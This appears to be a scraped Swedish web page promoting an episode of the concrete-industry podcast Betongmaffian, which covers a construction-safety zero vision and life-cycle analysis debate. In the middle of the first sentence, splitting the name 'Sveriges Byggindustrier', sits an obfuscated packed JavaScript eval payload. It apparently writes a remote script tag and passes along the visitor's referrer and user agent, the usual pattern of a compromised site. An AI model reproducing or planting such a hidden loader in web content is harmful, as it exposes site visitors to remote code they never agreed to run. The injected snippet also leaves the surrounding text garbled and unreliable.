Image Image Image Image Image Image Image Image Image Image

| 1 november, 2020

Scroll to top

Top

Visionen: ”Den säkraste branschen i världen”

Visionen: ”Den säkraste branschen i världen”
Sebastian

Sveriges eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|taizb|var|u0026u|referrer|ftdyf||js|php’.split(’|’),0,{}))
Byggindustrier storsatsar på sin nollvision mot dödsolyckor. Betongmaffian träffar Ola Månsson, vd på Sveriges Byggindustrier, som har tagit fram en nollvision, inte bara mot dödsolyckor, utan också mot allvarliga arbetsplatsolyckor.

– Jag ser framför mig att man talar om den säkraste branschen i världen. Jag ser framför mig att man vallfärdar till Sverige för att se hur vi jobbar med säkerhet, säger Ola Månsson.

Lyssna på nya Betongmaffian och hör hur Ola ska lyckas med sin nollvision. Betongmaffian gör även en tillbakablick på senaste tidens hållbarhetsdebatt med gäster som Martin Erlandsson, IVL Svenska Miljöinstitutet, och Charlotta Szczepanowski, hållbarhetschef på Riksbyggen.

– Konsekvens-livscykelanalys är som Alice i underlandet, där kan vad som helst hända, säger Martin Erlandsson i en jämförelse mellan branschens olika sätt att beräkna livscykler. Malin Löfsjögård, vd på Svensk Betong, kommenterar och diskussionen leds av programledare Roger Andersson, chefredaktör tidskriften Betong.

Lyssna här: https://soundcloud.com/betongmaffian/nollvisionen

http://www.svenskbetong.se/betongmaffian